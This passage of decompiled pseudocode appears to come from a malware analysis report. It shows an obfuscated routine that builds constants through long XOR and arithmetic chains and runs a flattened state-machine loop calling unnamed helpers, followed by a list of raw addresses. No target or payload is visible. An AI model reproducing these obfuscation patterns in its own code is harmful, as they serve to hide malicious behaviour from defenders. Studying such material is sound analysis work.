                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				unsigned int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				void* _t761;
                                                                                                                      				void* _t762;
                                                                                                                      				void* _t764;
                                                                                                                      				void* _t768;
                                                                                                                      				intOrPtr _t770;
                                                                                                                      				void* _t775;
                                                                                                                      				void* _t784;
                                                                                                                      				void* _t796;
                                                                                                                      				signed int _t802;
                                                                                                                      				signed int _t803;
                                                                                                                      				signed int _t804;
                                                                                                                      				signed int _t805;
                                                                                                                      				signed int _t806;
                                                                                                                      				signed int _t807;
                                                                                                                      				signed int _t808;
                                                                                                                      				signed int _t809;
                                                                                                                      				signed int _t810;
                                                                                                                      				signed int _t811;
                                                                                                                      				signed int _t812;
                                                                                                                      				signed int _t813;
                                                                                                                      				void* _t814;
                                                                                                                      				void* _t880;
                                                                                                                      				intOrPtr* _t900;
                                                                                                                      				signed int _t902;
                                                                                                                      				void* _t903;
                                                                                                                      				void* _t907;
                                                                                                                      				void* _t908;
                                                                                                                      				void* _t915;
                                                                                                                      
                                                                                                                      				_v120 = 0xaf91c9;
                                                                                                                      				_v120 = _v120 * 0xc;
                                                                                                                      				_t900 = __ecx;
                                                                                                                      				_v120 = _v120 ^ 0x083ad56c;
                                                                                                                      				_t907 = 0;
                                                                                                                      				_v160 = 0xdd67b2;
                                                                                                                      				_t796 = 0x60e8fa3;
                                                                                                                      				_v160 = _v160 + 0xffff9007;
                                                                                                                      				_v160 = _v160 ^ 0x00dcf7b9;
                                                                                                                      				_v128 = 0xd2bb52;
                                                                                                                      				_v128 = _v128 + 0x4dd6;
                                                                                                                      				_v128 = _v128 ^ 0x00d30928;
                                                                                                                      				_v340 = 0x29bf77;
                                                                                                                      				_v340 = _v340 | 0xa59b3ed7;
                                                                                                                      				_t802 = 0x26;
                                                                                                                      				_v84 = __ecx;
                                                                                                                      				_v340 = _v340 * 0x24;
                                                                                                                      				_v340 = _v340 / _t802;
                                                                                                                      				_v340 = _v340 ^ 0x02102f1f;
                                                                                                                      				_v136 = 0x5cee52;
                                                                                                                      				_t31 =  &_v136; // 0x5cee52
                                                                                                                      				_v136 =  *_t31 * 0x7d;
                                                                                                                      				_v136 = _v136 ^ 0x2d605e0a;
                                                                                                                      				_v108 = 0xa45e80;
                                                                                                                      				_v108 = _v108 | 0x375210cb;
                                                                                                                      				_v108 = _v108 ^ 0x37f65ecb;
                                                                                                                      				_v280 = 0xda067f;
                                                                                                                      				_v280 = _v280 / _t802;
                                                                                                                      				_v280 = _v280 + 0xffff2a0f;
                                                                                                                      				_v280 = _v280 ^ 0x0004e6dc;
                                                                                                                      				_v272 = 0x722186;
                                                                                                                      				_v272 = _v272 ^ 0xa185ec82;
                                                                                                                      				_v272 = _v272 ^ 0x3ba6498b;
                                                                                                                      				_v272 = _v272 ^ 0x9a51848f;
                                                                                                                      				_v292 = 0x4e3196;
                                                                                                                      				_v292 = _v292 + 0xb94f;
                                                                                                                      				_v292 = _v292 * 0x4e;
                                                                                                                      				_v292 = _v292 ^ 0x180b91c6;
                                                                                                                      				_v208 = 0x6998d9;
                                                                                                                      				_v208 = _v208 >> 0xe;
                                                                                                                      				_v208 = _v208 ^ 0x000001a6;
                                                                                                                      				_v240 = 0x4e7103;
                                                                                                                      				_v240 = _v240 * 0x4c;
                                                                                                                      				_v240 = _v240 ^ 0xd0eec6a6;
                                                                                                                      				_v240 = _v240 ^ 0xc7a74a42;
                                                                                                                      				_v312 = 0x7234ec;
                                                                                                                      				_v312 = _v312 ^ 0x522d2006;
                                                                                                                      				_v312 = _v312 << 6;
                                                                                                                      				_v312 = _v312 + 0x869a;
                                                                                                                      				_v312 = _v312 ^ 0x97c5c11a;
                                                                                                                      				_v364 = 0xaf3901;
                                                                                                                      				_v364 = _v364 + 0xffff0df3;
                                                                                                                      				_v364 = _v364 + 0xacd;
                                                                                                                      				_v364 = _v364 << 6;
                                                                                                                      				_v364 = _v364 ^ 0x2b91257f;
                                                                                                                      				_v244 = 0x42065a;
                                                                                                                      				_v244 = _v244 >> 8;
                                                                                                                      				_v244 = _v244 + 0x3d61;
                                                                                                                      				_v244 = _v244 ^ 0x000e9124;
                                                                                                                      				_v308 = 0x462496;
                                                                                                                      				_v308 = _v308 >> 1;
                                                                                                                      				_v308 = _v308 << 8;
                                                                                                                      				_v308 = _v308 + 0xc751;
                                                                                                                      				_v308 = _v308 ^ 0x2311deb1;
                                                                                                                      				_v372 = 0x2d527a;
                                                                                                                      				_v372 = _v372 >> 0xe;
                                                                                                                      				_v372 = _v372 << 0xb;
                                                                                                                      				_t902 = 0x27;
                                                                                                                      				_t803 = 0x29;
                                                                                                                      				_v372 = _v372 * 0x71;
                                                                                                                      				_v372 = _v372 ^ 0x027ecd5f;
                                                                                                                      				_v332 = 0xa669b;
                                                                                                                      				_v332 = _v332 >> 7;
                                                                                                                      				_v332 = _v332 + 0xd2e3;
                                                                                                                      				_v332 = _v332 >> 0xa;
                                                                                                                      				_v332 = _v332 ^ 0x000f2e3e;
                                                                                                                      				_v168 = 0x4e96bd;
                                                                                                                      				_v168 = _v168 << 3;
                                                                                                                      				_v168 = _v168 ^ 0x02701882;
                                                                                                                      				_v112 = 0xaba749;
                                                                                                                      				_v112 = _v112 / _t902;
                                                                                                                      				_v112 = _v112 ^ 0x0003e5b7;
                                                                                                                      				_v176 = 0xf83e47;
                                                                                                                      				_v176 = _v176 + 0xf669;
                                                                                                                      				_v176 = _v176 ^ 0x00f8a104;
                                                                                                                      				_v416 = 0x697041;
                                                                                                                      				_v416 = _v416 | 0x82970019;
                                                                                                                      				_v416 = _v416 / _t803;
                                                                                                                      				_v416 = _v416 + 0xffffd466;
                                                                                                                      				_v416 = _v416 ^ 0x0334f61d;
                                                                                                                      				_v252 = 0x15ebd3;
                                                                                                                      				_v252 = _v252 | 0x6e052c00;
                                                                                                                      				_t804 = 0x67;
                                                                                                                      				_v252 = _v252 / _t804;
                                                                                                                      				_v252 = _v252 ^ 0x0113ba89;
                                                                                                                      				_v276 = 0x344c30;
                                                                                                                      				_v276 = _v276 | 0x5d3660a5;
                                                                                                                      				_v276 = _v276 ^ 0x29f3ee58;
                                                                                                                      				_v276 = _v276 ^ 0x74c4d850;
                                                                                                                      				_v400 = 0xfbb174;
                                                                                                                      				_v400 = _v400 << 7;
                                                                                                                      				_v400 = _v400 ^ 0xf4a56f7f;
                                                                                                                      				_v400 = _v400 + 0xb6a2;
                                                                                                                      				_v400 = _v400 ^ 0x897127f1;
                                                                                                                      				_v408 = 0xeb5219;
                                                                                                                      				_v408 = _v408 + 0x740f;
                                                                                                                      				_v408 = _v408 << 0x10;
                                                                                                                      				_t805 = 0x65;
                                                                                                                      				_v408 = _v408 / _t805;
                                                                                                                      				_v408 = _v408 ^ 0x01f5cec8;
                                                                                                                      				_v268 = 0xb10ed5;
                                                                                                                      				_t806 = 0x6b;
                                                                                                                      				_v268 = _v268 * 0x79;
                                                                                                                      				_v268 = _v268 | 0x0fb1f039;
                                                                                                                      				_v268 = _v268 ^ 0x5fbe4096;
                                                                                                                      				_v132 = 0x68a9ad;
                                                                                                                      				_v132 = _v132 | 0x3a05ff43;
                                                                                                                      				_v132 = _v132 ^ 0x3a6b0a8d;
                                                                                                                      				_v392 = 0x795a70;
                                                                                                                      				_v392 = _v392 >> 0xd;
                                                                                                                      				_v392 = _v392 * 0x48;
                                                                                                                      				_v392 = _v392 / _t806;
                                                                                                                      				_v392 = _v392 ^ 0x000937af;
                                                                                                                      				_v236 = 0x1e45d1;
                                                                                                                      				_t807 = 0x32;
                                                                                                                      				_v236 = _v236 / _t807;
                                                                                                                      				_v236 = _v236 + 0xffffc842;
                                                                                                                      				_v236 = _v236 ^ 0x0007e8a5;
                                                                                                                      				_v228 = 0x827416;
                                                                                                                      				_v228 = _v228 << 4;
                                                                                                                      				_v228 = _v228 ^ 0x0826c6ea;
                                                                                                                      				_v284 = 0xd86f33;
                                                                                                                      				_v284 = _v284 << 0xe;
                                                                                                                      				_v284 = _v284 + 0xcd5c;
                                                                                                                      				_v284 = _v284 ^ 0x1bc78313;
                                                                                                                      				_v380 = 0x51f478;
                                                                                                                      				_v380 = _v380 | 0x2ab41351;
                                                                                                                      				_t808 = 0x6a;
                                                                                                                      				_v380 = _v380 / _t808;
                                                                                                                      				_v380 = _v380 ^ 0x7d9f8aa1;
                                                                                                                      				_v380 = _v380 ^ 0x7df5e8b9;
                                                                                                                      				_v192 = 0x594da7;
                                                                                                                      				_v192 = _v192 + 0xffff4010;
                                                                                                                      				_v192 = _v192 ^ 0x00542d8e;
                                                                                                                      				_v324 = 0x9c8afa;
                                                                                                                      				_t809 = 0x1e;
                                                                                                                      				_v324 = _v324 / _t809;
                                                                                                                      				_v324 = _v324 >> 0xb;
                                                                                                                      				_v324 = _v324 / _t902;
                                                                                                                      				_v324 = _v324 ^ 0x0001b8f0;
                                                                                                                      				_v212 = 0xd229d7;
                                                                                                                      				_v212 = _v212 << 3;
                                                                                                                      				_v212 = _v212 ^ 0x069444ca;
                                                                                                                      				_v288 = 0xa34a44;
                                                                                                                      				_v288 = _v288 ^ 0x8cd8fe8c;
                                                                                                                      				_v288 = _v288 + 0xffff9af8;
                                                                                                                      				_v288 = _v288 ^ 0x8c7655cb;
                                                                                                                      				_v220 = 0x9493db;
                                                                                                                      				_v220 = _v220 | 0x71cebed0;
                                                                                                                      				_v220 = _v220 ^ 0x71dfb10a;
                                                                                                                      				_v224 = 0xf1176b;
                                                                                                                      				_v224 = _v224 + 0xffffb0e2;
                                                                                                                      				_v224 = _v224 ^ 0x00f1becf;
                                                                                                                      				_v352 = 0xae98d2;
                                                                                                                      				_v352 = _v352 + 0xffffb89b;
                                                                                                                      				_v352 = _v352 * 0x11;
                                                                                                                      				_v352 = _v352 + 0x4d1e;
                                                                                                                      				_v352 = _v352 ^ 0x0b9fceb7;
                                                                                                                      				_v180 = 0x84b950;
                                                                                                                      				_v180 = _v180 >> 0xc;
                                                                                                                      				_v180 = _v180 ^ 0x00015b12;
                                                                                                                      				_v360 = 0x38dd65;
                                                                                                                      				_v360 = _v360 << 8;
                                                                                                                      				_v360 = _v360 << 0xb;
                                                                                                                      				_v360 = _v360 + 0xffffe7b0;
                                                                                                                      				_v360 = _v360 ^ 0xeb2159a9;
                                                                                                                      				_v188 = 0x175413;
                                                                                                                      				_v188 = _v188 | 0xeaa62ca7;
                                                                                                                      				_v188 = _v188 ^ 0xeab1c509;
                                                                                                                      				_v196 = 0x89f8f3;
                                                                                                                      				_v196 = _v196 | 0x84cde34a;
                                                                                                                      				_v196 = _v196 ^ 0x84ce03e9;
                                                                                                                      				_v204 = 0xfa0198;
                                                                                                                      				_v204 = _v204 + 0xba3a;
                                                                                                                      				_v204 = _v204 ^ 0x00fbcf1f;
                                                                                                                      				_v368 = 0x243d47;
                                                                                                                      				_v368 = _v368 + 0x6af1;
                                                                                                                      				_v368 = _v368 * 0x18;
                                                                                                                      				_t810 = 0x4c;
                                                                                                                      				_v368 = _v368 * 0x4a;
                                                                                                                      				_v368 = _v368 ^ 0xfe46f3db;
                                                                                                                      				_v164 = 0xfa5634;
                                                                                                                      				_v164 = _v164 << 0xa;
                                                                                                                      				_v164 = _v164 ^ 0xe95805f5;
                                                                                                                      				_v172 = 0x9d86eb;
                                                                                                                      				_v172 = _v172 << 4;
                                                                                                                      				_v172 = _v172 ^ 0x09d75722;
                                                                                                                      				_v256 = 0x88ae25;
                                                                                                                      				_v256 = _v256 + 0xffff9888;
                                                                                                                      				_v256 = _v256 / _t810;
                                                                                                                      				_v256 = _v256 ^ 0x0006cec9;
                                                                                                                      				_v300 = 0x4e3cba;
                                                                                                                      				_v300 = _v300 ^ 0xaec86311;
                                                                                                                      				_v300 = _v300 >> 1;
                                                                                                                      				_v300 = _v300 ^ 0x574be554;
                                                                                                                      				_v156 = 0xcc8ccd;
                                                                                                                      				_v156 = _v156 ^ 0x818e95a6;
                                                                                                                      				_v156 = _v156 ^ 0x8149d9f5;
                                                                                                                      				_v124 = 0x282d8b;
                                                                                                                      				_t811 = 0x63;
                                                                                                                      				_v124 = _v124 / _t811;
                                                                                                                      				_v124 = _v124 ^ 0x0006a08e;
                                                                                                                      				_v356 = 0x703a6e;
                                                                                                                      				_v356 = _v356 << 0xf;
                                                                                                                      				_t812 = 0x17;
                                                                                                                      				_v356 = _v356 / _t812;
                                                                                                                      				_v356 = _v356 * 0x47;
                                                                                                                      				_v356 = _v356 ^ 0x5a27ab7c;
                                                                                                                      				_v184 = 0xabb004;
                                                                                                                      				_v184 = _v184 * 0x62;
                                                                                                                      				_v184 = _v184 ^ 0x41bb11d7;
                                                                                                                      				_v412 = 0xb8c7ed;
                                                                                                                      				_v412 = _v412 * 0x62;
                                                                                                                      				_v412 = _v412 + 0xffff10d9;
                                                                                                                      				_v412 = _v412 * 0x19;
                                                                                                                      				_v412 = _v412 ^ 0xe85860ff;
                                                                                                                      				_v264 = 0x94e0d2;
                                                                                                                      				_v264 = _v264 + 0xffffdaee;
                                                                                                                      				_v264 = _v264 | 0xae8d85da;
                                                                                                                      				_v264 = _v264 ^ 0xae9ce3c7;
                                                                                                                      				_v316 = 0xd1b765;
                                                                                                                      				_v316 = _v316 * 0x77;
                                                                                                                      				_v316 = _v316 + 0xe12c;
                                                                                                                      				_v316 = _v316 + 0x9f51;
                                                                                                                      				_v316 = _v316 ^ 0x617dce52;
                                                                                                                      				_v144 = 0xce6b76;
                                                                                                                      				_v144 = _v144 | 0xba09f1aa;
                                                                                                                      				_v144 = _v144 ^ 0xbac3e068;
                                                                                                                      				_v404 = 0x63322a;
                                                                                                                      				_v404 = _v404 ^ 0x9f0f399b;
                                                                                                                      				_v404 = _v404 * 0x4e;
                                                                                                                      				_v404 = _v404 * 0x4a;
                                                                                                                      				_v404 = _v404 ^ 0x78104cb3;
                                                                                                                      				_v216 = 0xd594b2;
                                                                                                                      				_v216 = _v216 + 0xf571;
                                                                                                                      				_v216 = _v216 ^ 0x00d5cf76;
                                                                                                                      				_v116 = 0xef919a;
                                                                                                                      				_v116 = _v116 << 0xd;
                                                                                                                      				_v116 = _v116 ^ 0xf23180e8;
                                                                                                                      				_v348 = 0xce0390;
                                                                                                                      				_v348 = _v348 + 0xffffa675;
                                                                                                                      				_v348 = _v348 + 0xffff84a1;
                                                                                                                      				_v348 = _v348 ^ 0x00c1e2da;
                                                                                                                      				_v396 = 0x7df7ff;
                                                                                                                      				_v396 = _v396 | 0xfdfffbfc;
                                                                                                                      				_v396 = _v396 ^ 0xfdff4c22;
                                                                                                                      				_v320 = 0x9ca349;
                                                                                                                      				_v320 = _v320 + 0xc568;
                                                                                                                      				_t813 = 7;
                                                                                                                      				_v320 = _v320 * 0x74;
                                                                                                                      				_v320 = _v320 * 0x14;
                                                                                                                      				_v320 = _v320 ^ 0x928c2e40;
                                                                                                                      				_v232 = 0xd54f23;
                                                                                                                      				_v232 = _v232 ^ 0xe15f8e30;
                                                                                                                      				_v232 = _v232 >> 9;
                                                                                                                      				_v232 = _v232 ^ 0x0079ed07;
                                                                                                                      				_v328 = 0x9619e2;
                                                                                                                      				_v328 = _v328 >> 0xf;
                                                                                                                      				_v328 = _v328 + 0xffff55f8;
                                                                                                                      				_v328 = _v328 + 0x27fc;
                                                                                                                      				_v328 = _v328 ^ 0xfffb07bb;
                                                                                                                      				_v388 = 0xf5c662;
                                                                                                                      				_v388 = _v388 + 0xffff192d;
                                                                                                                      				_v388 = _v388 << 6;
                                                                                                                      				_v388 = _v388 ^ 0x81a7a751;
                                                                                                                      				_v388 = _v388 ^ 0xbc9807e7;
                                                                                                                      				_v200 = 0x8d276;
                                                                                                                      				_v200 = _v200 | 0x4d140240;
                                                                                                                      				_v200 = _v200 ^ 0x4d1b4a48;
                                                                                                                      				_v260 = 0x1bde30;
                                                                                                                      				_v260 = _v260 / _t813;
                                                                                                                      				_v260 = _v260 ^ 0x62b9a7e6;
                                                                                                                      				_v260 = _v260 ^ 0x62b42e65;
                                                                                                                      				_v148 = 0xa934f2;
                                                                                                                      				_v148 = _v148 | 0xd141041b;
                                                                                                                      				_v148 = _v148 ^ 0xd1e1ef22;
                                                                                                                      				_v336 = 0xd722ef;
                                                                                                                      				_v336 = _v336 ^ 0xf728ea61;
                                                                                                                      				_v336 = _v336 * 0x41;
                                                                                                                      				_v336 = _v336 + 0xdc3e;
                                                                                                                      				_v336 = _v336 ^ 0xf7ff9a03;
                                                                                                                      				_v344 = 0x7da9d7;
                                                                                                                      				_v344 = _v344 * 0x5b;
                                                                                                                      				_v344 = _v344 >> 5;
                                                                                                                      				_v344 = _v344 ^ 0xb332f6cb;
                                                                                                                      				_v344 = _v344 ^ 0xb251ceff;
                                                                                                                      				_v248 = 0xd93304;
                                                                                                                      				_v248 = _v248 << 5;
                                                                                                                      				_v248 = _v248 * 0xa;
                                                                                                                      				_v248 = _v248 ^ 0x0f7c3f5b;
                                                                                                                      				_v376 = 0xe01f7;
                                                                                                                      				_v376 = _v376 + 0xffff5834;
                                                                                                                      				_v376 = _v376 + 0xffff4130;
                                                                                                                      				_v376 = _v376 ^ 0xd27aacc5;
                                                                                                                      				_v376 = _v376 ^ 0xd2797cee;
                                                                                                                      				_v152 = 0x8f3686;
                                                                                                                      				_v152 = _v152 >> 0xc;
                                                                                                                      				_v152 = _v152 ^ 0x000cec01;
                                                                                                                      				_v384 = 0x1fccfd;
                                                                                                                      				_v384 = _v384 ^ 0xe361d411;
                                                                                                                      				_v384 = _v384 * 0x14;
                                                                                                                      				_v384 = _v384 + 0xb1de;
                                                                                                                      				_v384 = _v384 ^ 0xc5d6ed44;
                                                                                                                      				_v296 = 0x2c9c5a;
                                                                                                                      				_v296 = _v296 ^ 0xe8ab125b;
                                                                                                                      				_v296 = _v296 ^ 0x12f0c7da;
                                                                                                                      				_v296 = _v296 ^ 0xfa7b923a;
                                                                                                                      				_v304 = 0x37d359;
                                                                                                                      				_t903 = 0xcb9b74d;
                                                                                                                      				_v80 = 0x48;
                                                                                                                      				_v304 = _v304 * 0x7e;
                                                                                                                      				_v304 = _v304 | 0xb84966f9;
                                                                                                                      				_v304 = _v304 * 0x68;
                                                                                                                      				_v304 = _v304 ^ 0x2a2d9f44;
                                                                                                                      				_v140 = 0x53fc4;
                                                                                                                      				_v140 = _v140 ^ 0xe3b2dcd9;
                                                                                                                      				_v140 = _v140 ^ 0xe3b5fe0e;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t814 = 0xb5dc217;
                                                                                                                      						_t880 = 0xd2f1df;
                                                                                                                      						do {
                                                                                                                      							while(1) {
                                                                                                                      								L3:
                                                                                                                      								_t915 = _t796 - 0xb1829b2;
                                                                                                                      								if(_t915 > 0) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								if(_t915 == 0) {
                                                                                                                      									_push(_v372);
                                                                                                                      									_push(_v308);
                                                                                                                      									_push(0x1715e8);
                                                                                                                      									_t775 = E0017AB66(_v364, _v244, __eflags);
                                                                                                                      									_push(_v176);
                                                                                                                      									_push(_v112);
                                                                                                                      									_push(0x171538);
                                                                                                                      									__eflags = E00180EDA(E0017AB66(_v332, _v168, __eflags), _v120, _v416, _t775,  &_v100, _v252, _v276) - _v160;
                                                                                                                      									_t796 =  ==  ? 0xd2f1df : 0x4c92ee0;
                                                                                                                      									E0017AE03(_v400, _v408, _v268, _t775);
                                                                                                                      									E0017AE03(_v132, _v392, _v236, _t776);
                                                                                                                      									_t900 = _v84;
                                                                                                                      									_t908 = _t908 + 0x3c;
                                                                                                                      									goto L12;
                                                                                                                      								} else {
                                                                                                                      									if(_t796 == _t880) {
                                                                                                                      										_v88 = 0x100;
                                                                                                                      										_t784 = E00175FE2(_v128, 0x100, _v228,  &_v104, _v284, _v380, _v100);
                                                                                                                      										_t908 = _t908 + 0x14;
                                                                                                                      										__eflags = _t784 - _v340;
                                                                                                                      										_t762 = 0x595c7f7;
                                                                                                                      										_t796 =  ==  ? 0x595c7f7 : 0x2464b44;
                                                                                                                      										goto L2;
                                                                                                                      									} else {
                                                                                                                      										if(_t796 == 0x2464b44) {
                                                                                                                      											E00177027(_v304, _v312, _v100, _v140);
                                                                                                                      										} else {
                                                                                                                      											if(_t796 == _t762) {
                                                                                                                      												__eflags = E0018D76F(_v192, _v136, _v104, _v324) - _v108;
                                                                                                                      												_t796 =  ==  ? _t903 : 0xd356110;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												if(_t796 == 0x60e8fa3) {
                                                                                                                      													_t796 = 0xb1829b2;
                                                                                                                      													continue;
                                                                                                                      												} else {
                                                                                                                      													if(_t796 == 0x6aa287e) {
                                                                                                                      														E0018E884(_v388, _v200, _v260, _v92);
                                                                                                                      														_t796 = 0xbb8b89b;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															L2:
                                                                                                                      															_t814 = 0xb5dc217;
                                                                                                                      															_t880 = 0xd2f1df;
                                                                                                                      															goto L3;
                                                                                                                      														}
                                                                                                                      													} else {
                                                                                                                      														_t921 = _t796 - 0x873eae2;
                                                                                                                      														if(_t796 == 0x873eae2) {
                                                                                                                      															_push(_v412);
                                                                                                                      															_push(_v184);
                                                                                                                      															_push(0x171588);
                                                                                                                      															E0018F9E2(_v292, _v264, _v100,  *_t900, _v316, _v124, _v144,  *((intOrPtr*)(_t900 + 4)), _v404, _v216, E0017AB66(_v124, _v356, _t921),  &_v96);
                                                                                                                      															_t796 =  ==  ? 0xb5dc217 : 0xd356110;
                                                                                                                      															E0017AE03(_v116, _v348, _v396, _t790);
                                                                                                                      															_t908 = _t908 + 0x3c;
                                                                                                                      															L12:
                                                                                                                      															_t903 = 0xcb9b74d;
                                                                                                                      															L33:
                                                                                                                      															_t880 = 0xd2f1df;
                                                                                                                      															_t814 = 0xb5dc217;
                                                                                                                      															_t762 = 0x595c7f7;
                                                                                                                      														}
                                                                                                                      														goto L34;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								L37:
                                                                                                                      								return _t907;
                                                                                                                      							}
                                                                                                                      							__eflags = _t796 - _t814;
                                                                                                                      							if(_t796 == _t814) {
                                                                                                                      								_t761 = E0017F0A0(_v320, _v232, _v96, _v328,  &_v92, _v104, _v240);
                                                                                                                      								_t908 = _t908 + 0x14;
                                                                                                                      								__eflags = _t761;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t796 = 0xbb8b89b;
                                                                                                                      									goto L33;
                                                                                                                      								} else {
                                                                                                                      									_t796 = 0xc32131f;
                                                                                                                      									goto L1;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t796 - 0xbb8b89b;
                                                                                                                      								if(_t796 == 0xbb8b89b) {
                                                                                                                      									E00184E64(_v148, _v336, _v96, _v344, _v248);
                                                                                                                      									_t908 = _t908 + 0xc;
                                                                                                                      									_t796 = 0xd356110;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										goto L2;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t796 - 0xc32131f;
                                                                                                                      									if(_t796 == 0xc32131f) {
                                                                                                                      										_t764 = E0017CFCE(_v92);
                                                                                                                      										_t796 = 0x6aa287e;
                                                                                                                      										__eflags = _t764;
                                                                                                                      										_t907 =  !=  ? 1 : _t907;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										__eflags = _t796 - _t903;
                                                                                                                      										if(__eflags == 0) {
                                                                                                                      											_push(_v224);
                                                                                                                      											_push(_v220);
                                                                                                                      											_push(0x171588);
                                                                                                                      											_t906 = E0017AB66(_v212, _v288, __eflags);
                                                                                                                      											_v88 = _v80;
                                                                                                                      											_t768 = E00173E2A(_v352, _v180, _t765, _v80, _v360, _v188, _v196, _v204, _v104, _v280,  &_v88, _v80,  &_v76, _v368);
                                                                                                                      											_t908 = _t908 + 0x3c;
                                                                                                                      											__eflags = _t768 - _v272;
                                                                                                                      											if(_t768 != _v272) {
                                                                                                                      												_t796 = 0xd356110;
                                                                                                                      											} else {
                                                                                                                      												_t770 =  *0x195c9c; // 0x0
                                                                                                                      												E0018FD29( &_v68, _v164, _t770 + 0x10, _v172, 0x40);
                                                                                                                      												_t908 = _t908 + 0xc;
                                                                                                                      												_t796 = 0x873eae2;
                                                                                                                      											}
                                                                                                                      											E0017AE03(_v256, _v300, _v156, _t906);
                                                                                                                      											goto L12;
                                                                                                                      										} else {
                                                                                                                      											__eflags = _t796 - 0xd356110;
                                                                                                                      											if(__eflags != 0) {
                                                                                                                      												goto L34;
                                                                                                                      											} else {
                                                                                                                      												E00184E64(_v376, _v152, _v104, _v384, _v296);
                                                                                                                      												_t908 = _t908 + 0xc;
                                                                                                                      												_t796 = 0x2464b44;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							goto L37;
                                                                                                                      							L34:
                                                                                                                      						} while (_t796 != 0x4c92ee0);
                                                                                                                      						goto L37;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x0017a076
                                                                                                                      0x0017a081
                                                                                                                      0x0017a08c
                                                                                                                      0x0017a094
                                                                                                                      0x0017a0a1
                                                                                                                      0x0017a0a5
                                                                                                                      0x0017a0ad
                                                                                                                      0x0017a0b5
                                                                                                                      0x0017a0c0
                                                                                                                      0x0017a0c8
                                                                                                                      0x0017a0d3
                                                                                                                      0x0017a0db
                                                                                                                      0x0017a0e0
                                                                                                                      0x0017a0e5
                                                                                                                      0x0017a0ed
                                                                                                                      0x0017a0f5
                                                                                                                      0x0017a100
                                                                                                                      0x0017a10b
                                                                                                                      0x0017a116
                                                                                                                      0x0017a121
                                                                                                                      0x0017a12c
                                                                                                                      0x0017a137
                                                                                                                      0x0017a142
                                                                                                                      0x0017a14d
                                                                                                                      0x0017a158
                                                                                                                      0x0017a160
                                                                                                                      0x0017a16d
                                                                                                                      0x0017a17a
                                                                                                                      0x0017a17d
                                                                                                                      0x0017a181
                                                                                                                      0x0017a189
                                                                                                                      0x0017a194
                                                                                                                      0x0017a19c
                                                                                                                      0x0017a1a7
                                                                                                                      0x0017a1b2
                                                                                                                      0x0017a1ba
                                                                                                                      0x0017a1c5
                                                                                                                      0x0017a1d0
                                                                                                                      0x0017a1e6
                                                                                                                      0x0017a1ed
                                                                                                                      0x0017a1f8
                                                                                                                      0x0017a203
                                                                                                                      0x0017a20e
                                                                                                                      0x0017a215
                                                                                                                      0x0017a220
                                                                                                                      0x0017a22b
                                                                                                                      0x0017a236
                                                                                                                      0x0017a241
                                                                                                                      0x0017a253
                                                                                                                      0x0017a258
                                                                                                                      0x0017a261
                                                                                                                      0x0017a26c
                                                                                                                      0x0017a274
                                                                                                                      0x0017a27d
                                                                                                                      0x0017a280
                                                                                                                      0x0017a289
                                                                                                                      0x0017a28d
                                                                                                                      0x0017a295
                                                                                                                      0x0017a2a8
                                                                                                                      0x0017a2af
                                                                                                                      0x0017a2ba
                                                                                                                      0x0017a2c7
                                                                                                                      0x0017a2cb
                                                                                                                      0x0017a2d8
                                                                                                                      0x0017a2dc
                                                                                                                      0x0017a2e4
                                                                                                                      0x0017a2ef
                                                                                                                      0x0017a2fa
                                                                                                                      0x0017a305
                                                                                                                      0x0017a310
                                                                                                                      0x0017a31d
                                                                                                                      0x0017a321
                                                                                                                      0x0017a329
                                                                                                                      0x0017a331
